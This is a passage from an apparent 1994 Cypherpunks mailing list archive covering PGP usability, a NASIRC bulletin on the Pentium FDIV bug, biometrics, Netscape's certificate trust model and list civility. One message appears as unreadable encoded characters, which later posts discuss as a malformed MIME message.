confirmation is indeed a bit cumbersome if it gets invoked very often and your mail system isn't FV-smartened. So if you're planning on removing the cumbersomeness of your current protocol with software, why is it that you don't have an option to turn on crypto, whose cumbersomeness can also be mitigated with software? This position seems, well, inconsistent. Eric From sommerfeld at orchard.medford.ma.us Wed Dec 14 07:48:26 1994 From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld) Date: Wed, 14 Dec 94 07:48:26 PST Subject: BofA+Netscape In-Reply-To: Message-ID: <199412141536.KAA00735@orchard.medford.ma.us> -----BEGIN PGP SIGNED MESSAGE----- > Wasn't edlin based on the Unix ed? Nope. It's very similar to the CP/M `ed'. (I hesitate to say "identical" since I haven't touched a CP/M system since 1984..), but the first time I used edlin a couple years ago to edit an autoexec.bat file, I had CP/M flashbacks... Edlin is very different from the Unix `ed' and *its* ancestors (which are a line of several line-oriented editors which started life on CTSS, grew up on Multics, and were cut back down to size on Unix, only to sprout up again into ex and vi..) - Bill -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLu8Q47T+rHlVUGpxAQEm1AQAi61eq6ifrpEQDVoE8DLkU2N7leevmzzO tHIMYZBPEwWNvN1RVT/F2D0clVBnOTcq3Es5R7Ps8MlJPb3vO18DRFrsEn/RgEJS ZMwTeySMGnpJTd3pwRAESJQ8AntuyLd9eTCOndfsmA+pVOcC/Ashg/yakaXDNfSu gtgP0tMBwys= =k9iS -----END PGP SIGNATURE----- From hayashi at scs.sony.co.jp Wed Dec 14 07:49:12 1994 From: hayashi at scs.sony.co.jp (Tsuyoshi Hayashi) Date: Wed, 14 Dec 94 07:49:12 PST Subject: Sony's WWW server (NEWSWAVE) was opened Message-ID: <9412141549.AA26954@eagle.scs.sony.co.jp> Hi, punks, Sony, our parent company, began to provide several info and technical support for NEWS users on the WWW server. # Note that 'NEWS' is Sony's UNIX workstation. # Mainly, NEWS are used in Japan. # So, you probably don't know it... The Home Page is at URL: http://www1.sony.co.jp/ CAUTION: (1) The home page of it has large graphics data. (2) Homepage has some Japanese characters. So you can not read there probably. If you have time, peek it please. Thanks. P.S. This home page is NOT the (all of) Sony's home page. This page is managed by a NEWS support group. | Tsuyoshi Hayashi (hayashi at scs.sony.co.jp) | Tech. div., Sony Computer Systems Inc. From eric at remailer.net Wed Dec 14 08:56:55 1994 From: eric at remailer.net (Eric Hughes) Date: Wed, 14 Dec 94 08:56:55 PST Subject: A short primer on algebra Message-ID: <199412141754.JAA04293@largo.remailer.net> In the interest of good mathematical terminology, here is a short primer on the most basic algebraic structures. The definitions are not complete but rather evocative and are designed to prevent confusion. Field -- has addition, subtraction, multiplication, and division. Examples are the real numbers (R), the complex numbers (C), and the rational numbers (Q). An important class of fields for crypto are integers modulo a prime (Z/pZ or F_p). An important class of fields for error coding are polynomials with binary coeffients modulo an irreducible polynomial (F_2[x]/p(x)F_2[x]). Ring -- has addition, subtraction, multiplication, but no division. Every field is a ring but not vice-versa. Examples are the integers (Z), the integers modulo a composite number (Z/nZ) and polynomials with various rings, including R[x], Z[x]. Group -- has either addition/subtraction or multiplication/division, but not necessarily both. Every ring is a group under addition, but not vice-versa. If the group is commutative, we write the operation as addition typically; if not, we use multiplication. Examples of commutative groups are solutions of an elliptic curves and rotations in the plane. Examples of non-commutative groups are permutations, rotations in three dimensions, and Euclidean transformations of the plane. Eric From alex at omaha.com Wed Dec 14 09:07:03 1994 From: alex at omaha.com (Alex Strasheim) Date: Wed, 14 Dec 94 09:07:03 PST Subject: Big Brother database Message-ID: <199412141707.LAA00490@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- > >Do we then have a de facto (cardless) national ID? I think so. > > You got it, Bunky. There's an article in Forbes (the latest copy?) about a company that's making thermal scanning devices which can identify people via the pattern of blood vessels in their face. The advantage of this system over fingerprinting is that it can be done without letting the target know he or she's being identified. == Alex Strasheim | finger astrashe at nyx.cs.du.edu alex at omaha.com | for my PGP 2.6.1. public key -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY 9LLKfAYswiQ= =GEuy -----END PGP SIGNATURE----- From ravage at bga.com Wed Dec 14 09:35:02 1994 From: ravage at bga.com (Jim choate) Date: Wed, 14 Dec 94 09:35:02 PST Subject: Some info of interest (possibly) Message-ID: <199412141734.LAA21890@zoom.bga.com> Hi all, Any cypherpunks who would like to do public demonstrations or talks is invited to attend the sixth annual RobotFest held here in Austin, TX. It will be held in the city coliseum on April 1 & 2. If interested then please contact me through e-mail or call voice to 512-458-5818. The Central Texas Linux Users Group Meeting will be held Dec. 17, 1994 (this Saturday) at the downtown library here in Austin. We will be located in the 4th floor conference room. We will have several versions of PGP available for dos, amiga, and Linux boxes. If any c-punks would like to address the group please come on by. As of yesterday I got the ISDN link from my internet provider to ssz working and it should be accessible both dial-up and from internet some time next week. We have the full C address 204.96.173 for our use and have about 16 machines assigned at this time. We plan on dedicating at least one machine (and IP) to crypto related issues and software. Anyone who has experience doing crypto in Linux is eagerly sought for reference. Any c-punks who are planning on attending HoHoCon here in Austin are invited to drop by and party while they are in town..... Merry Christmas. From jdwilson at gold.chem.hawaii.edu Wed Dec 14 09:54:14 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 14 Dec 94 09:54:14 PST Subject: Re the Pentium Bug Message-ID: <199412141759.MAA19955@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- NASIRC BULLETIN #94-36 December 13, 1994 Floating Point Divide Flaw in Intel Pentium Processor Chip ============================================================ __ __ __ ___ ___ ____ ____ /_/\ /_/| /_/ / _/\ /_/| / __/ \ / __/\ | |\ \| || / \ \ | /\/ | || | /\ \/ | | \/ | ||\ \ || / /\ \ \ \ \ | || |_\/ /\ | | | || \ \|| / /--\ \ \ /\_\\ | || | |\ \ \ | \_/\ |_|/ \_|//_/ \_\/ \/__/ |_|/ |_| \_\/ \___\/ NASA Automated Systems Incident Response Capability ============================================================ NASIRC has become aware of a floating-point division problem in some versions of the Pentium processor chip, manufactured by Intel. Although this is not a security issue, NASIRC is bringing this to your attention because the defect could cause erroneous results for NASA projects which rely on complex mathematical computations involving double-precision arithmetic. Information on this problem is currently being propagated through the Internet and both technical and general publications. We are issuing this bulletin to provide a synopsis of what is known about the problem, how to check for the flaw, and what to do about it. It is important that any individual who uses a computer utilizing a Pentium processor perform the test(s) described in this bulletin on his/her machine to check for the bug. Although there have been reports the Pentium/60 is not affected, NASIRC recommends these units also be tested. There is no part number or other marking which would designate the flawed processor chips from the later revisions, which do not contain the bug. Intel considers this flaw to be minor, and has stated: "the average spreadsheet user should only be affected by this bug once every 27,000 years". However, NASIRC feels there is a high probability that work done on this class of desktop system in NASA is most likely to be computationally intensive, and the likelihood of achieving erroneous results is strong. From a reliability and reputation standpoint, NASA must ensure that the tools it uses to accomplish its mission perform properly. The president of Intel has issued a communique, stating his company's position on the problem, and the the process to follow should a site discover a flawed system. The communique is available via WWW at the URL: http://www.intel.com/about-intel/press/andy-msg.html. Pentium machines can be tested by using any of the following three methods: 1) Using the Microsoft Windows calculator, perform the following computation: x = 4195835 y = 3145727 z = x - (x/y)*y If z = 256, your chip has the bug. The Windows calculator is the easiest way to run this test. If you program this calculation, be sure to use to use double-precision variables! 2) Using any spreadsheet application (Lotus 1-2-3, Excel, etc), perform the following test: Enter the following data: In cell A1: 4195835 In cell A2: 3145727 In cell A3: 3145727 Calculate the following value: (A1 * A2)/A3 A correct result is: 4195835 An incorrect result (FDIV bug) is: 4195579 3) A small program named P87TEST.COM, to test for the existence of the bug was written and made available over the Internet by Terje Mathisen of Norsk Hydro A/S in Norway. A binary copy of P87TEST.COM can be obtained via anonymous FTP from the NASIRC online archive at the following URL: ftp://nasirc.nasa.gov/toolkits/diagnostics/Intel/p87test.com The Checksums are as follows: MD5: 322E8857C126D7CA336E7FFC31800939 SunOS: 08334 2 To run the program, simply type: P87TEST. An example of the program output is as follows: Pentium FDIV bug finder. (c) Terje Mathisen 1994 This is a Pentium or better cpu CPUID reports back: Vendor id = "GenuineIntel" Family (4=486, 5=Pentium etc.) = 05, stepping = 05, model = 01 CPU feature list: 1 : FPU (NDP) onchip 2 : Virtual 86 Mode Extensions 4 : I/O Breakpoints 8 : Page Size Extensions 10 : Time Stamp Counter 20 : Pentium stype MSRs 80 : Machine Check Exception 100 : CMPXCHG8B instruction available It has a 387 or later ndp It has the FDIV bug: (1.0/824633702449.0)*824633702449.0 is not equal to 1.0! Intel has stated that any site experiencing problems from this bug can obtain a replacement processor chip at no charge. Intel has set up a special customer service phone number for users affected by this bug. The Intel customer service desk can assist with obtaining replacement processor chips for affected systems. Any site confirming the existence of the bug in their Pentium chipset should contact Intel at 1-800-628-8686. If you have any questions about this bulletin, please contact the NASIRC Helpdesk. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= NASIRC ACKNOWLEDGES: Mr. Bob Solomon of the NASA Lewis Research Center for providing the information used in this bulletin, and Mr. Terje Mathisen of Norsk Hydro A/S for creating the pro- gram to test a system for the bug. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= =============================================================== For further assistance, please contact the NASIRC Helpdesk: Phone: 1-800-7-NASIRC Fax: 1-301-441-1853 Internet Email: nasirc at nasa.gov 24 Hour/Emergency Pager: 1-800-759-7243/Pin:2023056 STU III: 1-301-982-5480 =============================================================== This bulletin may be forwarded without restriction to sites and system administrators within the NASA community. The NASIRC online archive system is available via anonymous ftp. You will be required to enter your valid e-mail address as the "password". Once on the system, you can access the following information: ~/bulletins ! contains NASIRC bulletins ~/information ! contains various informational files ~/toolkits ! contains automated toolkit software The contents of these directories is updated on a continuous basis with relevant software and information; contact the NASIRC Helpdesk for more information or assistance. ----------------- PLEASE NOTE: Users outside of the NASA community may receive NASIRC bulletins. If you are not part of the NASA community, please contact your agency's response team to report incidents. Your agency's team will coordinate with NASIRC, who will ensure the proper internal NASA team(s) are notified. NASIRC is a member of the Forum of Incident Response and Security Teams (FIRST), a world-wide organiza- tion which provides for coordination between incident response teams in handling computer-security-related issues. You can obtain a list of FIRST member organizations and their constituencies by sending email to docserver at first.org with an empty "subject" line and a message body containing the line "send first-contacts". ************************************************************************* * Richard K. Yamane Leeward Community College * * Manager, Computer Center 96-045 Ala Ike * * Pearl City, Hawaii 96782 * * EM: sysrich at lccada.lcc.hawaii.edu * * Ph: (808) 455-0493 (Univ. of Hawaii campus) * ************************************************************************* ************************************************************************** *Marv Weissman * UH Computer Specialist * Leeward Community College * *cs_weissman at lccada.lcc.hawaii.edu (808)455-0465, voice. 455-0471, fax * * * * "Don't worry about what may happen tomorrow; just correct what you * * spoiled yesterday" * * * * (Midrash ) * * * ************************************************************************* - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu8yTyoZzwIn1bdtAQFVBgF6Agd6s2YAeRmBSsUiyLzvN15OoRdQObIk A0F8v9dG5xuHXyp/hWYHKzX6QIA0a6KP =544j -----END PGP SIGNATURE----- From unicorn at access.digex.net Wed Dec 14 10:18:19 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 14 Dec 94 10:18:19 PST Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) Message-ID: <199412141817.AA11248@access1.digex.net> Path: news1.digex.net!access1!unicorn From: unicorn at access1.digex.net (Black Unicorn) Newsgroups: alt.security.pgp Subject: I don't use PGP. (Was:I NUKED PGP.) Date: 14 Dec 1994 18:11:29 GMT Bretton Wade (bw16 at cornell.edu) wrote: : In article <3clri0$jqn at crl.crl.com>, jdulaney at crl.com (John Dulaney) wrote: : > 1) Too difficult to setup for the average user. : The "average" user of PGP is somebody who understands why they need PGP. : I'd say almost everybody with that level of knowledge is capable of : understanding "type randomly for a while", and the three or four standard : options to pass to PGP for day to day use. : > 3) I may forget to decrypt and miss an important note. : pay attention. If you need the security... : > 2) Requires that I exit my E-mail reader to decrypt which takes : > too much time. : > : > Suggestions: : > 1) Make it operable INSIDE PINE for example. : > 2) Put it in EUDORA or other MOSAIC/NETSCAPE browser and make it : > work AUTOMATICALLY, seemlessly, in the background. : > : read the newsgroup for about 30 seconds before you post. A lot of people : have put a lot of work into this sort of stuff. Some good, some not so : good, but that is for you to evaluate. : Bretton I'm a Mac user. MacPGP is a general nightmare. For those of us who have shell accounts, it is such a annoyance as to cause me to dislike using it at all except for the most extreme messages. I fear I am not of the ability, or of the spare time to work on making a seamless application myself or else it surely would have been a project on the top of my list. PGP needs to be a drop and drag application. I want a box sitting on my desktop, a box I can drag any document to and press two buttons after a mouse click and drag and encrypt/decrypt/sign a message which can then be copy/pasted to Zterm. Currently the only thing that nears the transparancy of this sort of thing is the bulky, annoying, poorly packaged and massively oversized, not to mention rarely working, MacPGP Kit. It doesn't seem to work out to any time advantage when I factor in the debugging and outright code crashes into my computation. The modular PGP project has been out there for almost a year. Any progress on this front? Does anyone care? Now that some lists are beginning to delay or reject unsigned messages altogether, I would really like to be able to reply to a simple note in less than the 7 minutes it currently takes me. This is the single most problematic hitch in PGP. It's not easy to use, to install, or to apply. Every move toward transparent crypto simply serves to increase user base and deter a prospective ban. It should be in EVERYONE's interest to try and push for a easier front end, while still allowing a flexible and detailed set of advanced options for the expert user. Curve Encrypt is a classic example of simplicty and ease. PGP front end designers for the Mac should take its example. -uni- (Dark) Spelling errors disclaimed, I've been up for 30 hours. -- 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From SADLER_C at HOSP.STANFORD.EDU Wed Dec 14 10:47:22 1994 From: SADLER_C at HOSP.STANFORD.EDU (Connie Sadler) Date: Wed, 14 Dec 94 10:47:22 PST Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) Message-ID: <01HKMQ2IZRXW004LPQ@MR.STANFORD.EDU> Subject: (fwd) I don't use PGP. (Was:I NUKED PGP.) From: "Connie Sadler"@MR.STANFORD.EDU Date: Wed, 14 Dec 1994 10:28:00 PDT A1-type: DOCUMENT Posting-date: Wed, 14 Dec 1994 00:00:00 PDT Folks, the level of flaming and gratuitous insulting (insultations?) is getting in the way of our message. We have on our list folks from Netscape, First Virtual, and (maybe) Digicash. Amongst others. And we certainly know that some of our messages are being forwarded to others. It behooves us to bear this in mind. If we can't calmly and clearly make our points about why privacy is important (and I mean in the sense of personal responsibility, not just the buzzword), about why end-to-end encryption is generally better than transport-level security, and about why "certifying authorities" is (to many of us) a flawed approach, then we are failing. More concisely, the Cypherpunks list is one of several "watering holes" that have appeared. Rather than trashing schemes which are not "'punkly correct" (PC, to coin a term), or which seem to have been put together in haste (perhaps for good reason)), we should instead use this golden opportunity to influence things. Call me an elitist, but I think the Cypherpunks list has an important role to play in influencing: -- Web development (Netscape, InterCon, others) -- digital cash (DigiCash, First Virtual, others) -- key escrow policies and plans (TIS, Microsoft, etc.) -- the future of PGP, tools, etc. -- etc. These things will have more of an effect on the future than convincing Aunt Erma to encrypt her mail. It may be that the comments made here about the security model of Netscape and First Virtual are on the mark, that these models need a lot more work. But I don't know see how insults or derision, or imputing bad motives to these folks, will help. (I think I was careful this past motive to avoid slinging mud at Bill Gates, for example, during the debate about reports that Microsoft could be including some form of key escrow in future OS releases. Not to say I've never flamed...) One lesson that's become clear is to expect that derisive comments made here will often find their way back to those derided. I always write with the expectation that folks as disparate as David Chaum and Dorothy Denning will perhaps be reading my words! (Hi, David! Hi, Dotty!) They may read them because someone forwards the messages to them, or because in 1996 the Cypherpunks list is sold on CD-ROM, or because one of them has access to the main NSA search engines (:-}). Whatever, my point is that insults are rarely helpful, and are unpersuasive. Insults also set a tone for later debate that is hard to get beyond. Not all debate recently has been insulting, of course. In fact, most hasn't been. But the insulting tone persists in some of the thread titles, and in the generally adversarial nature. (If I were Marc A. or Kipp, I'd not feel very welcome here....a situation which is counterproductive to our presumed goals.) Hal Finney nicely summarized why folks want some privacy on Web pages, and why transport-level security is generally less desirable than end-to-end security (including the special case of anonymous origination). This is the usual "who do you trust?" motif, which comes up in mail delivery _and_ in key certification. (Sidebar: In my view, Web browsers like Netscape and Mosaic, etc., should not get overly involved in these issues. These are issues for Web page owners to worry about and set policy on. The browsers may want the right hooks in them to allow authentication policies to be implemented, but the browser-makers should probably stay out of the gory details of which crypto algorithms are used, what access policies are set, etc. This makes it easier to drop-in stronger systems at a later time. I may be misunderstanding plans, I admit.) So, this is my little rant on "Can't we all just get along?" expressed in a different way. The Cypherpunks list has become one of several de facto "watering holes" where diverse participants interact. Let's not blow it. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From nobody at jpunix.com Wed Dec 14 11:46:57 1994 From: nobody at jpunix.com (Anonymous) Date: Wed, 14 Dec 94 11:46:57 PST Subject: Message-ID: <199412141951.OAA21255@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Black Unicorn writes: > The modular PGP project has been out there for almost a year. Any > progress on this front? Does anyone care? I percieve a 'chilling effect' going on with PGP compatible application development. Nobody wants to extract the core PGP code into a library because the code is dense and who wants to do that every update? Likewise with using PGPTools. Who wants to re write their application when the official PGP library materializes? So people are waiting... Could we get some updates on what is happening with the official pgp development? If it's not coming soon, or not at all, it would be nice to know so we can get going on improving PGPTools or writing our own. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLu9MqioZzwIn1bdtAQGUpgGAoyg9xD7355aypqebsUwrQdS8rfPH4Oiz NxrVnNp5L247pZRftliqdwO8Sh0OzgTZ =B8B5 -----END PGP SIGNATURE----- From shamrock at netcom.com Wed Dec 14 11:57:47 1994 From: shamrock at netcom.com (Lucky Green) Date: Wed, 14 Dec 94 11:57:47 PST Subject: News->Mail & CMU's Andrew Message System Message-ID: Big Lama wrote; >A, B, C and D and E and AMS and AFS and DCE and DFS and IPC and RPC >and MDA and STP and LSD and THC... >...and amphetamine. > >Big Lama (remembering an old hit, from the Flower Power period) "The Alphabet Song" by "David Peel and the Lower East Side." -- Lucky Green PGP encrypted mail preferred. From mccoy at io.com Wed Dec 14 12:19:26 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 12:19:26 PST Subject: pgp library In-Reply-To: <199412141951.OAA21255@bb.hks.net> Message-ID: <199412142019.OAA05039@pentagon.io.com> An anonymous person writes: > Black Unicorn writes: > > The modular PGP project has been out there for almost a year. Any > > progress on this front? Does anyone care? > > I percieve a 'chilling effect' going on with PGP compatible application > development. Nobody wants to extract the core PGP code into a library > because the code is dense and who wants to do that every update? In addition to this, the code really sucks as far as modularity goes. The next big version of PGP, which is supposed to include library hooks, etc., will probably not be out for five or six months. I do know of some people who are interested in working on a PGP compatible library of crypto code, but I am not quite sure what the status of that project is at this time... jim From sdw at lig.net Wed Dec 14 12:57:13 1994 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 14 Dec 94 12:57:13 PST Subject: Big Brother database In-Reply-To: <199412141707.LAA00490@omaha.omaha.com> Message-ID: > > -----BEGIN PGP SIGNED MESSAGE----- > > > >Do we then have a de facto (cardless) national ID? I think so. > > > > You got it, Bunky. > > There's an article in Forbes (the latest copy?) about a company that's > making thermal scanning devices which can identify people via the pattern > of blood vessels in their face. The advantage of this system over > fingerprinting is that it can be done without letting the target know he > or she's being identified. I think I've heard of that, but does it really handle makeup, beards, severe weather (lets see, it got to actual temp of -25F last Jan. in Dayton, OH)? I noticed a few weeks ago that the tarmac access doors in Chi. O'Hare have hand scanners. At first I thought they looked like palm scanners but upon inspection they were obviously a simple, durable, and effective biometrics reader. It had 3 pins you laid the arch of your hand against and a retro reflective surface. It's occured to me that, to go along with my Internet Doorbell (tm) ;-), I could put a load sensor on the porch and a line of vertical led sensors at the porch threshhold to get a highly probable biometric guess of a visitor. > Alex Strasheim | finger astrashe at nyx.cs.du.edu > alex at omaha.com | for my PGP 2.6.1. public key > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLu8mOREpP7+baaPtAQHgjQP/e+eHxzEKuigSihr/wYfUiUrF2fKzI04U > r7rQESL4GNG7UOJOisTmSbp9YYB1fMlAPgu0JkWk22YxbgqXIPMnVhyfsWjzH0d8 > z5EZ3/8F+MgXqTowY2weuWvsUx8VKFbHsePDemaKjIAEaRUz7R0kVbpMc57XUFMY > 9LLKfAYswiQ= > =GEuy > -----END PGP SIGNATURE----- > -- Stephen D. Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/~sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From tcmay at netcom.com Wed Dec 14 12:57:32 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 12:57:32 PST Subject: Less Flaming, More Civility In-Reply-To: <199412141934.LAA17000@netcom9.netcom.com> Message-ID: <199412142057.MAA00850@netcom9.netcom.com> A minor correction, when I wrote: > It may be that the comments made here about the security model of > Netscape and First Virtual are on the mark, that these models need a > lot more work. But I don't know see how insults or derision, or > imputing bad motives to these folks, will help. (I think I was careful > this past motive to avoid slinging mud at Bill Gates, for example, ^^^^^^ > during the debate about reports that Microsoft could be including some > form of key escrow in future OS releases. Not to say I've never > flamed...) I meant to say "this past summer." --Tim -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From pcassidy at world.std.com Wed Dec 14 13:19:51 1994 From: pcassidy at world.std.com (Peter F Cassidy) Date: Wed, 14 Dec 94 13:19:51 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142057.MAA00850@netcom9.netcom.com> Message-ID: � ��$W\)��27!UU\WP�,Hc)l(���>�b^����S/�l�U �tsᰰU]�[�}l5p���T�Mɪ�>�>�b^����S/�l�U �����\�����H���-��$pGE�8�I3 Ja,1g� �L�x7QI5�l ⶿� E]��V�K^mr�k��R From tcmay at netcom.com Wed Dec 14 13:26:27 1994 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 14 Dec 94 13:26:27 PST Subject: Less Flaming, More Civility In-Reply-To: Message-ID: <199412142125.NAA05427@netcom9.netcom.com> Peter F Cassidy wrote: > > rgnKxSRXXCmixjI3IVVVXFdQsCxIYylsKLrmrdU+s2Jes6X8v1MvwWzvVQ0K > qnRz4bCwVV3xW8J9bDVw9qizVMxNyarXPug+s2Jes6X8v1MvwWzvVQ0K5Njz > 3fJc69ra+75I8c3WLbTBJHBHRec400kzIEphLDFn2iCsTLp4N1FJNd5sDQri > tr/2DQpFXaTbVqpLXm1yumvm8FI= > This was one of those "MIME" things I got, that tell me to "Hit any key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main menu." Did I miss something here? This is not a flame, but there sure has been an increase in the frequency of this strange MIME messages lately. (At least with the practical demise of NeXT, I've been seeing fewer and fewer of those "NewGrazer" (?) messages.) --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From kipp at warp.mcom.com Wed Dec 14 13:32:16 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Wed, 14 Dec 94 13:32:16 PST Subject: Clarification of my remarks about Netscape Message-ID: <9412142130.AA20536@warp.mcom.com> In article <199412140047.QAA17489 at jobe.shell.portal.com>, you write: > -----BEGIN PGP SIGNED MESSAGE----- > > "Amanda Walker" writes, quoting someone from > Netscape: > > >> I didn't bother imbedding the RSA Unaffiliated User CA because I > >> didn't think server operators would use it to get certificates. > > >Well, it's what Apple is using for PowerTalk signers (which are a key pair and > >X.509 certificates, by default from the Unaffiliated User PCA). It makes > >sense for personal (as opposed to organizational) servers, such as someone > >running MacHTTP for their home page... > > >On the other hand, if RSA has set up a server PCA, that should be suffcient > >for now. I wonder what the certification policy is, though--how do you prove > >that you control a given server? For an Unaffiliated User CA certificate, you > >just have to show a notarized application and two forms of ID, one with a > >photo (driver's license, passport, etc.). I can't off hand think of an > >equivalently strong way to ID control of a server... > > This relates to the other part of my question, which didn't get answered: > what is the relationship between the name found in the X.509 certificate > and the server? Does X.509 include an internet address like mcom.com, > and the Netscape client checks that this matches the address of the > server it is connecting to? I am not very familiar with the certificate > format but I had the impression that it used a very different naming > scheme. > > Or does the client accept any valid certificate without regard to the > connection if any between the name in the certificate and the server to > which it is connected? This whole area was left undefined in the SSL > spec but will be important for interoperability. > > Hal > > -----BEGIN PGP SIGNATURE----- > Version: 2.6 > > iQBVAwUBLu5AkhnMLJtOy9MBAQEFQgH/dmiiEjycULNdDCNiU8SkoB57bHv9W5Lc > d+K7cBqq0ZknCwXtqZtbPTR7d8F1z0WFbMlP6QF3zywVz2GrDIg5kg== > =qQ9u > -----END PGP SIGNATURE----- >From the spec, the appendix on certificates: Certificates are validated using a few straightforward steps. First, the signature on the certificate is checked and if invalid, the certificate is invalid (either a transmission error or an attempted forgery occurred). Next, the CertificateInfo::issuer field is verified to be an issuer that the application trusts (using an unspecified mechanism). The CertificateInfo::validity field is checked against the current date and verified. Here is what we do in Netscape (for now). We have imbedded a set of certificates in the client. The certificates are for issuers of certificates that "we" trust. Any server which is certified by one of these issuers will be automatically trusted by the Netscape Navigator... Admittedly this is primitive, but it's a start. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From kipp at warp.mcom.com Wed Dec 14 13:36:06 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Wed, 14 Dec 94 13:36:06 PST Subject: BofA+Netscape Message-ID: <9412142134.AA20544@warp.mcom.com> In article <199412132218.QAA06065 at pentagon.io.com>, you write: > jamesd at netcom.com (James A. Donald) writes: > [regarding Netscape and IETF work...] > > > > Perry, they are not in trouble. They are the number one supplier > > of the internet killer app. > > They are the supplier of the current app-du-jour. What things look lie in > five months is another issue completely. > > > The plug for crypto that they have placed in Netscape 0.96 is > > the number one force bringing crypto awareness to the masses. > > Increasing use of PGP is the number one force bringing crypto awareness to > the masses, Netscape is just bringing bad crypto to the masses. > > > He said that Netscape would look at IPSP when it was beyond > > the "near" phase. [...] The correct response is "Gee that is great. > > Here are some working demo systems, and some slabs of documentation." > > No, the correct response is to stop idotic measures before the build up > enough inertia behind them to make it difficult to prevent mistakes from > being made. It is interesting that the creators of Netscape quite > frequently harp on "it is us against the goliath of Microsoft, so we > deserve the support of the net" and then they go out and do exactly the > sort of thing that makes Microsoft so unpopular; they take advantage of > thier market position to force bad technology on others. If the technology is so "bad", would someone please be so kind as to inform us what is so "bad" about it? We have a solution for a piece of the security puzzle: transport security. We admit its limitations. People keep saying its "bad". Please put some meat behind the commentary: Is it insecure? If so, how? Is there some cipher techonology that it absolutely must support? If so, which one? why? etc. --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From mccoy at io.com Wed Dec 14 13:57:06 1994 From: mccoy at io.com (Jim McCoy) Date: Wed, 14 Dec 94 13:57:06 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142125.NAA05427@netcom9.netcom.com> Message-ID: <199412142156.PAA00947@pentagon.io.com> tcmay at netcom.com (Timothy C. May) writes: [...] > This is not a flame, but there sure has been an increase in the > frequency of this strange MIME messages lately. Probably because that is the direction mail is going. If you can't do it too bad, but don't expect everyone else to wait around for you to catch up. Time to move your mail into the early 90s and get a MIME-aware mail agent... jim From perry at imsi.com Wed Dec 14 14:07:21 1994 From: perry at imsi.com (Perry E. Metzger) Date: Wed, 14 Dec 94 14:07:21 PST Subject: Less Flaming, More Civility In-Reply-To: <199412142125.NAA05427@netcom9.netcom.com> Message-ID: <9412142205.AA15948@snark.imsi.com> Timothy C. May says: > > This was one of those "MIME" things I got, that tell me to "Hit any > key to go on," "Now press ^H-Alt-Hyper-Abort to return to the main > menu." It wasn't real mime -- the content type was listed as TEXT/PLAIN; charset=US-ASCII with a base64 content transfer encoding, but the contents were not seven bit ascii. I have no idea what the thing was. .pm From 